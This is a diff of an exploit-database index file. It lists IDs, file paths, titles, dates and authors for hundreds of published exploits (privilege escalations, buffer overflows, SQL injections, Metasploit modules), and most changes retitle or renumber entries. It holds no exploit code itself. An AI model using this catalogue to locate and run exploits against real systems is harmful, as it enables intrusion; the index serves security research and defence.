39310,platforms/windows/local/39310.txt,"Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (2) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0
39311,platforms/windows/local/39311.txt,"Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (1) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0
39310,platforms/windows/local/39310.txt,"Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (MS16-008) (2)",2016-01-25,"Google Security Research",windows,local,0
39311,platforms/windows/local/39311.txt,"Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (MS16-008) (1)",2016-01-25,"Google Security Research",windows,local,0
40360,platforms/linux/local/40360.txt,"MySQL / MariaDB / PerconaDB 5.5.51 / 5.6.32 / 5.7.14 - Code Execution / Privilege Escalation",2016-09-12,"Dawid Golunski",linux,local,3306
40774,platforms/linux/local/40774.sh,"Nagios 4.2.2 - Privilege Escalation",2016-11-18,"Vincent Malguy",linux,local,0
39340,platforms/android/local/39340.cpp,"Google Android - 'sensord' Privilege Escalation",2016-01-27,s0m3b0dy,android,local,0
@ -8896,17 +8897,18 @@ id,file,description,date,author,platform,type,port
41711,platforms/windows/local/41711.rb,"VMware Host Guest Client Redirector - DLL Side Loading (Metasploit)",2016-08-06,Metasploit,windows,local,0
41712,platforms/windows/local/41712.rb,"CADA 3S CoDeSys Gateway Server - Directory Traversal (Metasploit)",2013-02-02,Metasploit,windows,local,0
41713,platforms/windows/local/41713.rb,"MOXA Device Manager Tool 2.1 - Buffer Overflow (Metasploit)",2010-10-20,Metasploit,windows,local,0
41721,platforms/windows/local/41721.c,"Forticlient 5.2.3 Windows 10 x64 (Pre Anniversary) - Privilege Escalation",2017-03-25,sickness,windows,local,0
41722,platforms/windows/local/41722.c,"Forticlient 5.2.3 Windows 10 x64 (Post Anniversary) - Privilege Escalation",2017-03-25,sickness,windows,local,0
41721,platforms/win_x86-64/local/41721.c,"Forticlient 5.2.3 (Windows 10 x64 Pre Anniversary) - Privilege Escalation",2017-03-25,sickness,win_x86-64,local,0
41722,platforms/win_x86-64/local/41722.c,"Forticlient 5.2.3 (Windows 10 x64 Post Anniversary) - Privilege Escalation",2017-03-25,sickness,win_x86-64,local,0
41745,platforms/hardware/local/41745.txt,"QNAP QTS < 4.2.4 - Domain Privilege Escalation",2017-03-27,"Pasquale Fiorillo",hardware,local,0
41754,platforms/hardware/local/41754.txt,"Intermec PM43 Industrial Printer - Privilege Escalation",2017-03-28,"Jean-Marie Bourbon",hardware,local,0
41760,platforms/linux/local/41760.txt,"Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via UserNamespace Privilege Escalation",2016-02-22,halfdog,linux,local,0
41760,platforms/linux/local/41760.txt,"Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation",2016-02-22,halfdog,linux,local,0
41761,platforms/linux/local/41761.txt,"AUFS (Ubuntu 15.10) - 'allow_userns' Fuse/Xattr User Namespaces Privilege Escalation",2016-02-19,halfdog,linux,local,0
41762,platforms/linux/local/41762.txt,"Ubuntu 14.04/15.10 - User Namespace Overlayfs Xattr Setgid Privilege Escalation",2016-11-22,halfdog,linux,local,0
41763,platforms/linux/local/41763.txt,"Ubuntu 15.10 - 'USERNS ' Overlayfs Over Fuse Privilege Escalation",2016-11-22,halfdog,linux,local,0
41764,platforms/linux/local/41764.txt,"NTP - Privilege Escalation",2016-01-21,halfdog,linux,local,0
41765,platforms/linux/local/41765.txt,"Ubuntu 15.04 (Dev) - 'Upstart' Logrotation Privilege Escalation",2015-03-12,halfdog,linux,local,0
41765,platforms/linux/local/41765.txt,"Ubuntu 15.04 (Development) - 'Upstart' Logrotation Privilege Escalation",2015-03-12,halfdog,linux,local,0
41766,platforms/linux/local/41766.txt,"Vm86 - Syscall Task Switch Kernel Panic / Privilege Escalation",2012-10-19,halfdog,linux,local,0
41770,platforms/linux/local/41770.txt,"Linux Kernel 2.6.32 (Ubuntu 10.04) - /proc Handling SUID Privilege Escalation",2011-01-17,halfdog,linux,local,0
41771,platforms/windows/local/41771.py,"Disk Sorter Enterprise 9.5.12 - 'Import Command' Buffer Overflow",2017-03-29,"Daniel Teixeira",windows,local,0
41772,platforms/windows/local/41772.py,"DiskBoss Enterprise 7.8.16 - 'Import Command' Buffer Overflow",2017-03-29,"Daniel Teixeira",windows,local,0
41773,platforms/windows/local/41773.py,"Sync Breeze Enterprise 9.5.16 - 'Import Command' Buffer Overflow",2017-03-29,"Daniel Teixeira",windows,local,0
@ -9755,7 +9757,7 @@ id,file,description,date,author,platform,type,port
4720,platforms/windows/remote/4720.html,"HP Compaq Notebooks - ActiveX Remote Code Execution",2007-12-11,porkythepig,windows,remote,0
4724,platforms/windows/remote/4724.py,"HP OpenView Network Node Manager 07.50 - CGI Remote Buffer Overflow",2007-12-12,muts,windows,remote,80
4744,platforms/hardware/remote/4744.txt,"rooter VDSL Device - (Goahead WebServer) Disclosure",2007-12-18,NeoCoderz,hardware,remote,0
4745,platforms/windows/remote/4745.cpp,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065)",2007-12-18,axis,windows,remote,0
4745,platforms/windows/remote/4745.cpp,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (1)",2007-12-18,axis,windows,remote,0
4746,platforms/windows/remote/4746.html,"RavWare Software - '.MAS' Flic Control Remote Buffer Overflow",2007-12-18,shinnai,windows,remote,0
4747,platforms/windows/remote/4747.vbs,"RaidenHTTPD 2.0.19 - (ulang) Remote Command Execution",2007-12-18,rgod,windows,remote,0
4754,platforms/win_x86/remote/4754.pl,"3proxy 0.5.3g (Windows x86) - logurl() Remote Buffer Overflow (Perl)",2007-12-18,"Marcin Kozlowski",win_x86,remote,3128
@ -9783,7 +9785,7 @@ id,file,description,date,author,platform,type,port
4918,platforms/windows/remote/4918.html,"RTS Sentry Digital Surveillance - 'CamPanel.dll 2.1.0.2' Buffer Overflow",2008-01-16,rgod,windows,remote,0
4923,platforms/windows/remote/4923.txt,"Miniweb 0.8.19 - Multiple Vulnerabilities",2008-01-16,"Hamid Ebadi",windows,remote,0
4932,platforms/windows/remote/4932.html,"Digital Data Communications - 'RtspVaPgCtrl' Class Remote Buffer Overflow",2008-01-17,rgod,windows,remote,0
4934,platforms/windows/remote/4934.c,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065)",2008-01-18,"Marcin Kozlowski",windows,remote,0
4934,platforms/windows/remote/4934.c,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (2)",2008-01-18,"Marcin Kozlowski",windows,remote,0
4941,platforms/hardware/remote/4941.txt,"Belkin Wireless G Plus MIMO Router F5D9230-4 - Authentication Bypass",2008-01-20,DarkFig,hardware,remote,0
4946,platforms/windows/remote/4946.html,"Toshiba Surveillance - 'MeIpCamX.dll 1.0.0.4' Remote Buffer Overflow",2008-01-20,rgod,windows,remote,0
4947,platforms/linux/remote/4947.c,"Axigen 5.0.2 - AXIMilter Remote Format String",2008-01-21,hempel,linux,remote,0
@ -9802,12 +9804,12 @@ id,file,description,date,author,platform,type,port
5025,platforms/windows/remote/5025.html,"MySpace Uploader - 'MySpaceUploader.ocx 1.0.0.4' Buffer Overflow",2008-01-31,Elazar,windows,remote,0
5028,platforms/windows/remote/5028.html,"Chilkat FTP ActiveX 2.0 - 'ChilkatCert.dll' Insecure Method Exploit",2008-01-31,darkl0rd,windows,remote,0
5045,platforms/windows/remote/5045.html,"Sejoong Namo ActiveSquare 6 - 'NamoInstaller.dll' ActiveX Buffer Overflow",2008-02-03,plan-s,windows,remote,0
5046,platforms/windows/remote/5046.php,"Yahoo! Music Jukebox 2.2 - AddImage() ActiveX Remote Buffer Overflow (1)",2008-02-03,anonymous,windows,remote,0
5046,platforms/windows/remote/5046.php,"Yahoo! Music Jukebox 2.2 - 'AddImage()' ActiveX Remote Buffer Overflow (1)",2008-02-03,anonymous,windows,remote,0
5048,platforms/windows/remote/5048.html,"Yahoo! Music Jukebox 2.2 - 'AddImage()' ActiveX Remote Buffer Overflow (2)",2008-02-03,exceed,windows,remote,0
5049,platforms/windows/remote/5049.html,"FaceBook PhotoUploader - 'ImageUploader4.ocx 4.5.57.0' Buffer Overflow",2008-02-03,Elazar,windows,remote,0
5051,platforms/windows/remote/5051.html,"Yahoo! Music JukeBox 2.2 - 'AddButton()' ActiveX Remote Buffer Overflow",2008-02-03,Elazar,windows,remote,0
5052,platforms/windows/remote/5052.html,"Yahoo! JukeBox MediaGrid - 'AddBitmap()' ActiveX Buffer Overflow",2008-02-03,Elazar,windows,remote,0
5069,platforms/windows/remote/5069.pl,"dBpowerAMP Audio Player Release 2 - '.m3u' Buffer Overflow",2008-02-06,securfrog,windows,remote,0
5069,platforms/windows/remote/5069.pl,"dBpowerAMP Audio Player 2 - '.m3u' Buffer Overflow",2008-02-06,securfrog,windows,remote,0
5078,platforms/windows/remote/5078.htm,"Backup Exec System Recovery Manager 7.0.1 - Arbitrary File Upload",2008-02-07,titon,windows,remote,0
5079,platforms/win_x86/remote/5079.c,"SapLPD 6.28 (Windows x86) - Remote Buffer Overflow",2008-02-07,BackBone,win_x86,remote,515
5087,platforms/windows/remote/5087.html,"Microsoft DirectSpeechSynthesis Module - Remote Buffer Overflow",2008-02-09,rgod,windows,remote,0
@ -9908,7 +9910,7 @@ id,file,description,date,author,platform,type,port
6217,platforms/windows/remote/6217.pl,"BlazeDVD 5.0 - PLF Playlist File Remote Buffer Overflow",2008-08-10,LiquidWorm,windows,remote,0
6220,platforms/windows/remote/6220.html,"Cisco WebEx Meeting Manager UCF - 'atucfobj.dll' ActiveX Remote Buffer Overflow",2008-08-10,"Guido Landi",windows,remote,0
6227,platforms/windows/remote/6227.c,"IntelliTamper 2.07 - HTTP Header Remote Code Execution",2008-08-10,"Wojciech Pawlikowski",windows,remote,0
6229,platforms/multiple/remote/6229.txt,"Apache Tomcat < 6.0.18 - utf8 Directory Traversal (1)",2008-08-11,"Simon Ryeo",multiple,remote,0
6229,platforms/multiple/remote/6229.txt,"Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC)",2008-08-11,"Simon Ryeo",multiple,remote,0
6236,platforms/multiple/remote/6236.txt,"BIND 9.5.0-P2 - (randomized ports) Remote DNS Cache Poisoning Exploit",2008-08-13,Zbr,multiple,remote,0
6238,platforms/windows/remote/6238.c,"IntelliTamper 2.07/2.08 Beta 4 - A HREF Remote Buffer Overflow",2008-08-13,kralor,windows,remote,0
6248,platforms/windows/remote/6248.pl,"FlashGet 1.9.0.1012 - 'FTP PWD Response' SEH STACK Overflow",2008-08-15,SkOd,windows,remote,21
@ -10158,9 +10160,9 @@ id,file,description,date,author,platform,type,port
9137,platforms/windows/remote/9137.html,"Mozilla Firefox 3.5 - (Font tags) Remote Buffer Overflow",2009-07-13,Sberry,windows,remote,0
9139,platforms/windows/remote/9139.pl,"JetAudio 7.5.3 COWON Media Center - '.wav' Crash",2009-07-14,prodigy,windows,remote,0
9143,platforms/linux/remote/9143.txt,"Virtualmin < 3.703 - Multiple Local+Remote Vulnerabilities",2009-07-14,"Filip Palian",linux,remote,0
9181,platforms/windows/remote/9181.py,"Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray Exploit (1)",2009-07-17,"David Kennedy (ReL1K)",windows,remote,0
9181,platforms/windows/remote/9181.py,"Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray (1)",2009-07-17,"David Kennedy (ReL1K)",windows,remote,0
9209,platforms/hardware/remote/9209.txt,"DD-WRT HTTPd Daemon/Service - Remote Command Execution",2009-07-20,gat3way,hardware,remote,0
9214,platforms/windows/remote/9214.pl,"Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray",2009-07-20,netsoul,windows,remote,0
9214,platforms/windows/remote/9214.pl,"Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray (2)",2009-07-20,netsoul,windows,remote,0
9224,platforms/windows/remote/9224.py,"Microsoft Office Web Components Spreadsheet - ActiveX (OWC10/11) Exploit",2009-07-21,"Ahmed Obied",windows,remote,0
9247,platforms/osx/remote/9247.py,"Mozilla Firefox 3.5 (OSX) - (Font tags) Remote Buffer Overflow",2009-07-24,Dr_IDE,osx,remote,0
9278,platforms/freebsd/remote/9278.txt,"NcFTPd 2.8.5 - Remote Jail Breakout",2009-07-27,kingcope,freebsd,remote,0
@ -10354,7 +10356,7 @@ id,file,description,date,author,platform,type,port
11422,platforms/windows/remote/11422.rb,"Hyleos ChemView 1.9.5.1 - ActiveX Control Buffer Overflow (Metasploit)",2010-02-12,Dz_attacker,windows,remote,0
11453,platforms/windows/remote/11453.py,"Wireshark 1.2.5 - LWRES getaddrbyname Buffer Overflow (calc.exe)",2010-02-15,"Nullthreat and Pure|Hate",windows,remote,0
11457,platforms/windows/remote/11457.pl,"Microsoft Internet Explorer 6/7 - Remote Code Execution (Remote User Add Exploit)",2010-02-15,"Sioma Labs",windows,remote,0
11468,platforms/windows/remote/11468.py,"EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow",2010-02-15,dookie,windows,remote,21
11468,platforms/windows/remote/11468.py,"EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (1)",2010-02-15,dookie,windows,remote,21
11497,platforms/linux/remote/11497.txt,"gitWeb 1.5.2 - Remote Command Execution",2010-02-18,"S2 Crew",linux,remote,0
11500,platforms/windows/remote/11500.py,"EasyFTP Server 1.7.0.2 - (HTTP) Remote Buffer Overflow",2010-02-18,"ThE g0bL!N",windows,remote,0
11539,platforms/windows/remote/11539.py,"EasyFTP Server 1.7.0.2 - CWD Remote Buffer Overflow",2010-02-22,athleet,windows,remote,0
@ -10476,7 +10478,7 @@ id,file,description,date,author,platform,type,port
14451,platforms/windows/remote/14451.rb,"EasyFTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow (Metasploit)",2010-07-23,"Muhamad Fadzil Ramli",windows,remote,0
14456,platforms/aix/remote/14456.c,"IBM AIX 5l FTPd - Remote DES Hash Exploit",2010-07-24,kingcope,aix,remote,0
14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - Authenticated HTTP Remote Buffer Overflow",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0
14489,platforms/unix/remote/14489.c,"Apache Tomcat < 6.0.18 - utf8 Directory Traversal (2)",2010-07-28,mywisdom,unix,remote,0
14489,platforms/unix/remote/14489.c,"Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal",2010-07-28,mywisdom,unix,remote,0
14492,platforms/windows/remote/14492.c,"Symantec Ams Intel Alert Handler Service - Design Flaw",2010-07-28,Spider,windows,remote,0
14505,platforms/windows/remote/14505.html,"Barcodewiz Barcode ActiveX Control 3.29 - Buffer Overflow (SEH)",2010-07-30,loneferret,windows,remote,0
14514,platforms/windows/remote/14514.html,"SigPlus Pro 3.74 - ActiveX LCDWriteString() Remote Buffer Overflow JIT Spray (ASLR + DEP Bypass)",2010-07-31,mr_me,windows,remote,0
@ -10521,7 +10523,7 @@ id,file,description,date,author,platform,type,port
15071,platforms/windows/remote/15071.txt,"Softek Barcode Reader Toolkit ActiveX 7.1.4.14 - 'SoftekATL.dll' Buffer Overflow (PoC)",2010-09-21,LiquidWorm,windows,remote,0
15072,platforms/windows/remote/15072.rb,"Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit) (1)",2010-09-21,Trancer,windows,remote,0
15073,platforms/windows/remote/15073.rb,"Novell iPrint Client - ActiveX Control 'debug' Buffer Overflow (Metasploit)",2010-09-21,Trancer,windows,remote,0
15168,platforms/windows/remote/15168.rb,"Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit)",2010-10-01,Trancer,windows,remote,0
15168,platforms/windows/remote/15168.rb,"Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit) (2)",2010-10-01,Trancer,windows,remote,0
15186,platforms/ios/remote/15186.txt,"iOS FileApp < 2.0 - Directory Traversal",2010-10-02,m0ebiusc0de,ios,remote,0
15213,platforms/asp/remote/15213.pl,"Microsoft ASP.NET - Padding Oracle (MS10-070)",2010-10-06,"Giorgio Fedon",asp,remote,0
15600,platforms/windows/remote/15600.html,"Netcraft Toolbar 1.8.1 - Remote Code Execution",2010-11-23,Rew,windows,remote,0
@ -10660,7 +10662,7 @@ id,file,description,date,author,platform,type,port
16318,platforms/multiple/remote/16318.rb,"JBoss JMX - Console Deployer Upload and Execute (Metasploit)",2010-10-19,Metasploit,multiple,remote,0
16319,platforms/multiple/remote/16319.rb,"JBoss JMX - Console Beanshell Deployer WAR Upload and Deployment (Metasploit)",2011-01-10,Metasploit,multiple,remote,0
16320,platforms/unix/remote/16320.rb,"Samba - 'Username' map script' Command Execution (Metasploit)",2010-08-18,Metasploit,unix,remote,0
16321,platforms/linux/remote/16321.rb,"Samba 2.2.2 < 2.2.6 - nttrans Buffer Overflow (Metasploit)",2010-04-28,Metasploit,linux,remote,0
16321,platforms/linux/remote/16321.rb,"Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit) (2)",2010-04-28,Metasploit,linux,remote,0
16322,platforms/solaris/remote/16322.rb,"Solaris LPD - Command Execution (Metasploit)",2010-09-20,Metasploit,solaris,remote,0
16323,platforms/solaris_sparc/remote/16323.rb,"Solaris dtspcd - Heap Overflow (Metasploit)",2010-04-30,Metasploit,solaris_sparc,remote,0
16324,platforms/multiple/remote/16324.rb,"Solaris Sadmind - Command Execution (Metasploit)",2010-06-22,Metasploit,multiple,remote,0
@ -11218,7 +11220,7 @@ id,file,description,date,author,platform,type,port
17345,platforms/windows/remote/17345.py,"HP Data Protector Client 6.11 - EXEC_SETUP Remote Code Execution PoC (ZDI-11-056)",2011-05-29,fdiskyou,windows,remote,0
17339,platforms/windows/remote/17339.py,"HP Data Protector Client 6.11 - EXEC_CMD Remote Code Execution PoC (ZDI-11-055)",2011-05-28,fdiskyou,windows,remote,0
17352,platforms/windows/remote/17352.rb,"7-Technologies IGSS 9 - Data Server/Collector Packet Handling Vulnerabilities (Metasploit)",2011-05-30,Metasploit,windows,remote,0
17354,platforms/windows/remote/17354.py,"EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow",2011-06-01,b33f,windows,remote,0
17354,platforms/windows/remote/17354.py,"EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (2)",2011-06-01,b33f,windows,remote,0
17355,platforms/windows/remote/17355.rb,"Golden FTP Server 4.70 - PASS Stack Buffer Overflow (Metasploit)",2011-06-02,Metasploit,windows,remote,21
17356,platforms/hardware/remote/17356.txt,"MODACOM URoad-5000 1450 - Remote Command Execution/Backdoor",2011-06-02,"Alex Stanev",hardware,remote,0
17359,platforms/windows/remote/17359.pl,"Xitami Web Server 2.5b4 - Remote Buffer Overflow",2011-06-03,mr.pr0n,windows,remote,0
@ -13228,13 +13230,13 @@ id,file,description,date,author,platform,type,port
24479,platforms/windows/remote/24479.py,"Freefloat FTP Server 1.0 - 'Raw' Commands Buffer Overflow",2013-02-11,superkojiman,windows,remote,0
24490,platforms/windows/remote/24490.rb,"Novell Groupwise Client - 'gwcls1.dll' ActiveX Remote Code Execution (Metasploit)",2013-02-12,Metasploit,windows,remote,0
24494,platforms/hardware/remote/24494.rb,"Polycom HDX - Telnet Authentication Bypass (Metasploit)",2013-02-14,"Paul Haas",hardware,remote,23
24495,platforms/windows/remote/24495.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit)",2013-02-14,"Scott Bell",windows,remote,0
24495,platforms/windows/remote/24495.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (1)",2013-02-14,"Scott Bell",windows,remote,0
24502,platforms/windows/remote/24502.rb,"Foxit Reader Plugin - URL Processing Buffer Overflow (Metasploit)",2013-02-14,Metasploit,windows,remote,0
24526,platforms/windows/remote/24526.py,"Microsoft Office 2010 - Download Execute",2013-02-20,g11tch,windows,remote,0
24527,platforms/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH And DUPF Buffer Overflow (Metasploit)",2013-02-20,Metasploit,windows,remote,0
24528,platforms/windows/remote/24528.rb,"BigAnt Server 2.97 - DUPF Command Arbitrary File Upload (Metasploit)",2013-02-20,Metasploit,windows,remote,0
24529,platforms/php/remote/24529.rb,"OpenEMR - Arbitrary .PHP File Upload (Metasploit)",2013-02-20,Metasploit,php,remote,0
24538,platforms/windows/remote/24538.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit)",2013-02-23,Metasploit,windows,remote,0
24538,platforms/windows/remote/24538.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (2)",2013-02-23,Metasploit,windows,remote,0
24539,platforms/multiple/remote/24539.rb,"Java Applet JMX - Remote Code Execution (Metasploit) (2)",2013-02-25,Metasploit,multiple,remote,0
24547,platforms/php/remote/24547.rb,"Kordil EDms 2.2.60rc3 - Unauthenticated Arbitrary File Upload (Metasploit)",2013-02-26,Metasploit,php,remote,0
24548,platforms/php/remote/24548.rb,"Glossword 1.8.8 < 1.8.12 - Arbitrary File Upload (Metasploit)",2013-02-26,Metasploit,php,remote,0
@ -13602,7 +13604,7 @@ id,file,description,date,author,platform,type,port
27244,platforms/linux/remote/27244.txt,"Wimpy MP3 Player 5 - Text File Overwrite",2006-02-16,ReZEN,linux,remote,0
27271,platforms/windows/remote/27271.rb,"HP Data Protector - CMD Install Service (Metasploit)",2013-08-02,"Ben Turner",windows,remote,0
27277,platforms/windows/remote/27277.py,"PCMan FTP Server 2.07 - 'PASS' Command Buffer Overflow",2013-08-02,Ottomatik,windows,remote,0
27528,platforms/hardware/remote/27528.rb,"D-Link Devices - Unauthenticated Remote Command Execution (Metasploit) (2)",2013-08-12,Metasploit,hardware,remote,0
27528,platforms/hardware/remote/27528.rb,"D-Link Devices - 'command.php' Unauthenticated Remote Command Execution (Metasploit)",2013-08-12,Metasploit,hardware,remote,0
27293,platforms/php/remote/27293.rb,"PineApp Mail-SeCure - test_li_connection.php Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,php,remote,7443
27294,platforms/php/remote/27294.rb,"PineApp Mail-SeCure - ldapsyncnow.php Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,php,remote,7443
27295,platforms/unix/remote/27295.rb,"PineApp Mail-SeCure - livelog.html Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,unix,remote,7443
@ -13614,7 +13616,7 @@ id,file,description,date,author,platform,type,port
27397,platforms/linux/remote/27397.txt,"Apache suEXEC - Privilege Elevation / Information Disclosure",2013-08-07,kingcope,linux,remote,0
27400,platforms/windows/remote/27400.py,"HP Data Protector - Arbitrary Remote Command Execution",2013-08-07,"Alessandro Di Pinto and Claudio Moletta",windows,remote,0
27401,platforms/windows/remote/27401.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Authentication Bypass / Directory Traversal SAM Retrieval Exploit",2013-08-07,Wireghoul,windows,remote,0
27428,platforms/hardware/remote/27428.rb,"D-Link Devices - Unauthenticated Remote Command Execution (Metasploit) (1)",2013-08-08,Metasploit,hardware,remote,0
27428,platforms/hardware/remote/27428.rb,"D-Link Devices - 'tools_vct.xgi' Unauthenticated Remote Command Execution (Metasploit)",2013-08-08,Metasploit,hardware,remote,0
27429,platforms/windows/remote/27429.rb,"Mozilla Firefox - onreadystatechange Event DocumentViewerImpl Use-After-Free (Metasploit)",2013-08-08,Metasploit,windows,remote,0
27452,platforms/hardware/remote/27452.txt,"F5 Firepass 4100 SSL VPN - Cross-Site Scripting",2006-03-21,"ILION Research",hardware,remote,0
27508,platforms/php/remote/27508.txt,"PHP 4.x/5.x - Html_Entity_Decode() Information Disclosure",2006-03-29,Samuel,php,remote,0
@ -15394,7 +15396,7 @@ id,file,description,date,author,platform,type,port
41479,platforms/windows/remote/41479.py,"SysGauge 1.5.18 - Buffer Overflow",2017-02-28,"Peter Baris",windows,remote,0
41480,platforms/hardware/remote/41480.txt,"WePresent WiPG-1500 - Backdoor Account",2017-02-27,"Quentin Olagne",hardware,remote,0
41511,platforms/windows/remote/41511.py,"FTPShell Client 6.53 - Buffer Overflow",2017-03-04,"Peter Baris",windows,remote,0
41545,platforms/windows/remote/41545.py,"Azure Data Expert Ultimate 2.2.16 - Buffer Overflow",2017-03-07,"Peter Baris",windows,remote,0
41545,platforms/windows/remote/41545.py,"Azure Data Expert Ultimate 2.2.16 - Buffer Overflow",2017-03-07,"Peter Baris",windows,remote,0
41592,platforms/windows/remote/41592.txt,"MobaXterm Personal Edition 9.4 - Directory Traversal",2017-03-11,hyp3rlinx,windows,remote,0
41598,platforms/cgi/remote/41598.rb,"Netgear R7000 and R6400 - 'cgi-bin' Command Injection (Metasploit)",2017-03-13,Metasploit,cgi,remote,80
41613,platforms/windows/remote/41613.rb,"IBM WebSphere - RCE Java Deserialization (Metasploit)",2017-03-15,Metasploit,windows,remote,8800
@ -15407,7 +15409,7 @@ id,file,description,date,author,platform,type,port
41684,platforms/multiple/remote/41684.rb,"GIT 1.8.5.6 / 1.9.5 / 2.0.5 / 2.1.4/ 2.2.1 & Mercurial < 3.2.3 - Multiple Vulnerabilities (Metasploit)",2014-12-18,Metasploit,multiple,remote,0
41689,platforms/multiple/remote/41689.rb,"Ruby on Rails 4.0.x / 4.1.x / 4.2.x (Web Console v2) - Whitelist Bypass Code Execution (Metasploit)",2015-06-16,Metasploit,multiple,remote,0
41690,platforms/multiple/remote/41690.rb,"Apache Struts < 1.3.10 / < 2.3.16.2 - ClassLoader Manipulation Remote Code Execution (Metasploit)",2014-03-06,Metasploit,multiple,remote,0
41693,platforms/multiple/remote/41693.rb,"Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit)",2003-03-07,Metasploit,multiple,remote,0
41693,platforms/multiple/remote/41693.rb,"Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit) (1)",2003-03-07,Metasploit,multiple,remote,0
41694,platforms/multiple/remote/41694.rb,"SSH - User Code Execution (Metasploit)",1999-01-01,Metasploit,multiple,remote,0
41695,platforms/linux/remote/41695.rb,"Redmine SCM Repository - Arbitrary Command Execution (Metasploit)",2010-12-19,Metasploit,linux,remote,0
41718,platforms/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",hardware,remote,0
@ -17156,7 +17158,7 @@ id,file,description,date,author,platform,type,port
2725,platforms/php/webapps/2725.txt,"Cyberfolio 2.0 RC1 - 'av' Parameter Remote File Inclusion",2006-11-06,the_day,php,webapps,0
2726,platforms/php/webapps/2726.txt,"Agora 1.4 RC1 - 'MysqlfinderAdmin.php' Remote File Inclusion",2006-11-06,the_day,php,webapps,0
2727,platforms/php/webapps/2727.txt,"OpenEMR 2.8.1 - (srcdir) Multiple Remote File Inclusion",2006-11-06,the_day,php,webapps,0
2728,platforms/php/webapps/2728.txt,"Article Script 1.6.3 - 'rss.php' SQL Injection (1)",2006-11-06,Liz0ziM,php,webapps,0
2728,platforms/php/webapps/2728.txt,"Article Script 1.6.3 - 'rss.php' SQL Injection",2006-11-06,Liz0ziM,php,webapps,0
2731,platforms/php/webapps/2731.pl,"iPrimal Forums - 'admin/index.php' Change User Password Exploit",2006-11-06,Bl0od3r,php,webapps,0
2732,platforms/php/webapps/2732.txt,"PHPGiggle 12.08 - (CFG_PHPGIGGLE_ROOT) File Inclusion",2006-11-06,ajann,php,webapps,0
2733,platforms/php/webapps/2733.txt,"iWare Pro 5.0.4 - 'chat_panel.php' Remote Code Execution",2006-11-07,nuffsaid,php,webapps,0
@ -18731,7 +18733,7 @@ id,file,description,date,author,platform,type,port
5185,platforms/asp/webapps/5185.txt,"PORAR WebBoard - 'question.asp' SQL Injection",2008-02-25,xcorpitx,asp,webapps,0
5186,platforms/php/webapps/5186.txt,"PHP-Nuke Module Kose_Yazilari - 'artid' Parameter SQL Injection",2008-02-25,xcorpitx,php,webapps,0
5187,platforms/asp/webapps/5187.txt,"MiniNuke 2.1 - 'uid' Parameter SQL Injection",2008-02-25,S@BUN,asp,webapps,0
5189,platforms/php/webapps/5189.pl,"DBHcms 1.1.4 - Remote File Inclusion",2008-02-25,Iron,php,webapps,0
5189,platforms/php/webapps/5189.pl,"DBHcms 1.1.4 - 'code' Remote File Inclusion",2008-02-25,Iron,php,webapps,0
5192,platforms/php/webapps/5192.pl,"Nukedit 4.9.x - Remote Create Admin",2008-02-26,r3dm0v3,php,webapps,0
5194,platforms/php/webapps/5194.txt,"WordPress Plugin Sniplets 1.1.2 - Remote File Inclusion / Cross-Site Scripting / Remote Code Execution",2008-02-26,NBBN,php,webapps,0
5195,platforms/php/webapps/5195.txt,"Mambo Component SimpleBoard 1.0.3 - 'catid' Parameter SQL Injection",2008-02-27,"it's my",php,webapps,0
@ -18920,7 +18922,7 @@ id,file,description,date,author,platform,type,port
5449,platforms/php/webapps/5449.php,"KwsPHP - (Upload) Remote Code Execution",2008-04-14,Ajax,php,webapps,0
5450,platforms/php/webapps/5450.txt,"Classifieds Caffe - 'cat_id' Parameter SQL Injection",2008-04-15,JosS,php,webapps,0
5452,platforms/php/webapps/5452.txt,"LightNEasy sqlite / no database 1.2.2 - Multiple Vulnerabilities",2008-04-15,girex,php,webapps,0
5454,platforms/php/webapps/5454.txt,"LaserNet CMS 1.5 - SQL Injection (2)",2008-04-15,cO2,php,webapps,0
5454,platforms/php/webapps/5454.txt,"LaserNet CMS 1.5 - SQL Injection",2008-04-15,cO2,php,webapps,0
